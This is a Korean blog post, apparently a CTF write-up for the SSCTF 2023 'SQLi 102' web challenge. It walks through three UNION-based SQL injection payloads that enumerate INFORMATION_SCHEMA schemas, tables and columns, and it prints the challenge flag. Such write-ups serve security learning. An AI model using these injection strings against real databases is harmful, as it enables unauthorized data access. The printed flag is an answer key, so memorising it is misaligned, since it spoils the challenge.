티스토리 뷰

CTF/Web

[SSCTF 2023] SQLi 102

youung 2023. 8. 19. 20:45
728x90
반응형

문제 정보

 

 

 

 

 

접속 시 나오는 화면

 

숨겨진 table을 찾아서 그 table의 column 이름을 찾으면

FLAG를 찾을 수 있을 것 같다!

 

 

 

 

 

 

 

hi%' UNION SELECT '', SCHEMA_NAME, '', '', '', '', '', '' FROM INFORMATION_SCHEMA.SCHEMATA --

 

먼저 

hi%' UNION SELECT '', SCHEMA_NAME, '', '', '', '', '', '' FROM INFORMATION_SCHEMA.SCHEMATA --

구문으로 데이터베이스에서 스키마를 찾아냈다!

 

 

 

 

 

 

 

hi' UNION SELECT '', TABLE_NAME , '', '', '', '', '', '' FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA =' sqli102 ' --

 

다음은

hi' UNION SELECT '', TABLE_NAME , '', '', '', '', '', '' FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA =' sqli102 ' --

구문으로 finde me라는 table 명을 찾았다!!!

 

 

 

 

 

 

 

 

hi' UNION SELECT '', COLUMN_NAME, '', '', '', '', '', '' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='findme' --

 

마지막으로

hi' UNION SELECT '', COLUMN_NAME, '', '', '', '', '', '' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='findme' -- 

구문으로 FLAG를 찾을 수 있었다!

 

 

 

 

 

FLAG

SCTF{b451c_SQLi_5k1lls}

 

 

 

728x90
반응형

'CTF > Web' 카테고리의 다른 글

[UrmiaCTF 2023] htaccess  (0) 2023.09.04
[SSCTF 2023] SQLi 103  (0) 2023.08.19
[SSCTF 2023] SQLi 101  (0) 2023.08.19
[LIT CTF 2023] unsecure  (0) 2023.08.07
[LIT CTF 2023] My boss left  (0) 2023.08.07
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
글 보관함